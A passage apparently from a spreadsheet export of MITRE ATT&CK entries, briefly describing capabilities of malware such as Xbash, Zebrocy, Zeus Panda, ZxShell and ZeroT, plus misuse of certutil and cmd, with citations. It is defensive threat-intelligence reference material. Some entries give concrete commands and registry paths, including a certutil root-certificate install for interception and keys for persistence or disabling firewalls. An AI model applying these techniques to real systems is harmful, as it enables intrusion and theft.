    <t>[Xbash](https://attack.mitre.org/software/S0341) has destroyed Linux-based databases as part of its ransomware capabilities.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) has maliciously encrypted victim's database systems and demanded a cryptocurrency ransom be paid.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can obtain a webpage hosted on Pastebin to update its C2 domain list.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when it finds those services running in order to conduct further execution.(Citation: Unit42 Xbash Sept 2018)(Citation: Trend Micro Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can download additional malicious files from its C2 server.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can execute malicious JavaScript payloads on the victim’s machine.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can use mshta for executing scripts.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can perform port scanning of TCP and UDP ports.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports.(Citation: Unit42 Xbash Sept 2018)(Citation: Trend Micro Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can create a Startup item for persistence if it determines it is on a Windows system.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can use regsvr32 for executing scripts.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can collect IP addresses and local intranet information from a victim’s machine.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can execute malicious VBScript payloads on the victim’s machine.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) uses HTTP for C2 communications.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) decrypts downloaded files before execution.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) uses HTTP GET requests to download other files that are executed in memory.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) encrypts its configuration file using a simple algorithm.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) checks for antimalware solution processes on the system.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) checks for the system’s Windows OS version and hostname.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) uses HTTP for C2.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>The [ZLib](https://attack.mitre.org/software/S0086) backdoor compresses communications using the standard Zlib compression library.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to enumerate files and drives.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to download files.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to obtain screenshots of the compromised system.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to enumerate system information.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to discover and manipulate Windows services.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) communicates over HTTP for C2.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to execute shell commands.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) creates Registry keys to allow itself to run as various services.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251)  has used a method similar to RC4 as well as AES for encryption and hexadecimal for encoding data before exfiltration. (Citation: Securelist Sofacy Feb 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) uses SSL and AES ECB for encrypting C2 communications.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) installs an application-defined Windows hook to get notified when a network drive has been attached, so it can then use the hook to call its RecordToFile file stealing method.(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has the capability to upload dumper tools that extract credentials from web browsers and store them in database files.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) decodes its secondary payload and writes it to the victim’s machine. [Zebrocy](https://attack.mitre.org/software/S0251) also uses AES and XOR to decrypt strings and payloads.(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) has exfiltrated data to the designated C2 server using HTTP POST requests.(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has a command to delete files and directories.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) searches for files that are 60mb and less and contain the following extensions: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .exe, .zip, and .rar. [Zebrocy](https://attack.mitre.org/software/S0251) also runs the &lt;code&gt;echo %APPDATA%&lt;/code&gt; command to list the contents of the directory.(Citation: Securelist Sofacy Feb 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019) [Zebrocy](https://attack.mitre.org/software/S0251) can obtain the current execution path as well as perform drive enumeration.(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) obtains additional code to execute on the victim's machine, including the downloading of a secondary payload.(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) stores all collected information in a single file before exfiltration.(Citation: ESET Zebrocy Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) performs persistence with a logon script via adding to the Registry key &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.(Citation: ESET Zebrocy Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses SMTP and POP3 for C2.(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) identifies network drives when they are added to victim systems.(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) enumerates information about connected storage devices.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses the &lt;code&gt;tasklist&lt;/code&gt; and &lt;code&gt;wmic process get Capture, ExecutablePath&lt;/code&gt; commands to gather the processes running on the system.(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) executes the &lt;code&gt;reg query&lt;/code&gt; command to obtain information in the Registry.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) creates an entry in a Registry Run key for the malware to execute on startup.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has a command to create a scheduled task for persistence.(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>A variant of [Zebrocy](https://attack.mitre.org/software/S0251) captures screenshots of the victim’s machine in JPEG and BMP format.(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251)'s Delphi variant was packed with UPX.(Citation: Unit42 Sofacy Dec 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) has used URL/Percent Encoding on data exfiltrated via HTTP POST requests.(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) collects the OS version, computer name and serial number for the storage volume C:\. [Zebrocy](https://attack.mitre.org/software/S0251) also runs the &lt;code&gt;systeminfo&lt;/code&gt; command to gather system information. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) runs the &lt;code&gt;ipconfig /all&lt;/code&gt; command.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses &lt;code&gt;netstat -aon&lt;/code&gt; to gather network connection information.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) gets the username from the system.(Citation: ESET Zebrocy Nov 2018)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) gathers the current time zone and date information from the system.(Citation: ESET Zebrocy Nov 2018)(Citation: CISA Zebrocy Oct 2020)</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) uses HTTP for C2.(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) uses cmd.exe to execute commands on the system.(Citation: ESET Zebrocy May 2019)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>One variant of [Zebrocy](https://attack.mitre.org/software/S0251) uses WMI queries to gather information.(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has obfuscated DLLs and functions using dummy API calls inserted between real instructions.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>Many [ZeroT](https://attack.mitre.org/software/S0230) samples can perform UAC bypass by using eventvwr.exe to execute a malicious file.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has used DLL side-loading to load malicious payloads.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) shellcode decrypts and decompresses its RC4-encrypted payload.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) can download additional payloads onto the victim.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has encrypted its payload with RC4.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>Some [ZeroT](https://attack.mitre.org/software/S0230) DLL files have been packed with UPX.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has retrieved stage 2 payloads as Bitmap images that use Least Significant Bit (LSB) steganography.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has used RC4 to encrypt C2 traffic.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) gathers the victim's IP address and domain information, and then sends it to its C2 server.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) has used HTTP for C2.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) can add a new service to ensure [PlugX](https://attack.mitre.org/software/S0013) persists on the system when delivered as another payload onto the system.(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>Some variants of the [Zeroaccess](https://attack.mitre.org/software/S0027) Trojan have been known to store data in Extended Attributes.(Citation: Ciubotariu 2014)</t>
  </si>
  <si>
    <t>[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode rootkit.(Citation: Sophos ZeroAccess)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can hook GetClipboardData function to watch for clipboard pastes to collect.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can launch remote scripts on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) hooks processes by leveraging its own IAT hooked functions.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) decrypts strings in the code during the execution process.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) has a command to delete a file. It also can uninstall scripts and delete files to cover its track.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) searches for specific directories on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can download additional malware plug-in modules and execute them on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can perform keylogging on the victim’s machine by hooking the functions TranslateMessage and WM_KEYDOWN.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) modifies several Registry keys under &lt;code&gt;HKCU\Software\Microsoft\Internet Explorer\ PhishingFilter\&lt;/code&gt; to disable phishing filters.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) encrypts strings with XOR and obfuscates the macro code from the initial payload. [Zeus Panda](https://attack.mitre.org/software/S0330) also encrypts all configuration and settings in AES and RC4.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks processes on the system and if they meet the necessary requirements, it injects into that process.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) uses PowerShell to download and execute the payload.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks for running processes on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks for the existence of a Registry key and if it contains certain values.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) adds persistence by creating Registry Run keys.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can take screenshots of the victim’s machine.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) checks to see if anti-virus, anti-spyware, or firewall products are installed in the victim’s environment.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) collects the OS version, system architecture, computer name, product ID, install date, and information on the keyboard mapping to determine the language used on the system.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) collects the current system time (UTC) and sends it back to the C2 server.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) uses HTTP for C2 communications.(Citation: Talos Zeus Panda Nov 2017)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) can launch an interface where it can execute several commands on the victim’s PC.(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to clear system event logs.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command called RunAs, which creates a new process as another user or process context.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) hooks several API functions to spawn system threads.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can disable the firewall by modifying the registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile&lt;/code&gt;.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can kill AV products' processes.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) is injected into a shared SVCHOST process.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a feature to perform SYN flood attack on a host.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can delete files from the system.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has used FTP for C2 connections.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to open a file manager and explorer on the system.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to transfer files from a remote host.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a feature to capture a remote computer's keystrokes using a keylogger.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) has a feature to create local user accounts.(Citation: Talos ZxShell Oct 2014 )</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can launch port scans.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command, ps, to obtain a listing of processes on the system.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can set up an HTTP or SOCKS proxy.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can query the netsvc group value data located in the svchost group Registry key.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has remote desktop functionality.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has used rundll32.exe to execute other DLLs and named pipes.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can capture screenshots.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can collect the local hostname, operating system details, CPU speed, and total physical memory.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can collect the owner and organization information from the target workstation.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can check the services on the system.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) supports functionality for VNC sessions.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has a command to perform video device spying.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) has used HTTP for C2 connections.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) can launch a reverse command shell.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 )(Citation: Secureworks BRONZEUNION Feb 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[ZxShell](https://attack.mitre.org/software/S0412) can create a new service using the service parser function ProcessScCommand.(Citation: Talos ZxShell Oct 2014 ) </t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) contains a copy of the OpenSSL library to encrypt C2 traffic.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) can run a copy of cmd.exe.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) can use a WMI script to achieve persistence.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[at](https://attack.mitre.org/software/S0110) can be used to schedule a task on a system.(Citation: TechNet At)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to download files from C2 to the infected host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has added itself to the Registry Run key as "NVIDIA" to appear legitimate.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to use the &lt;code&gt;WinExec&lt;/code&gt; API to execute malware on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to add itself to the Registry Run key for persistence.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to detect if the infected host is running an anti-virus process.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) can extract malware from a downloaded JPEG.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to send system volume information to C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) has been used to decode binaries hidden inside certificate files as Base64 information.(Citation: Malwarebytes Targeted Attack against Saudi Arabia)</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) can be used to download files from a given URL.(Citation: TechNet Certutil)(Citation: LOLBAS Certutil)</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) can be used to install browser root certificates as a precursor to performing man-in-the-middle between connections to banking websites. Example command: &lt;code&gt;certutil -addstore -f -user ROOT ProgramData\cert512121.der&lt;/code&gt;.(Citation: Palo Alto Retefe)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to delete files from the file system.(Citation: TechNet Del)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to find files and directories with native functionality such as &lt;code&gt;dir&lt;/code&gt; commands.(Citation: TechNet Dir)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to copy files to/from a remotely connected external system.(Citation: TechNet Copy)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to copy files to/from a remotely connected internal system.(Citation: TechNet Copy)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to find information about the operating system.(Citation: TechNet Dir)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) is used to execute programs and other actions at the command-line interface.(Citation: TechNet Cmd)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to list the directories on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to download files to the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to list running processes on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to detect anti-virus products and processes on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to gather information on installed applications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to base64 encode C2 communications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
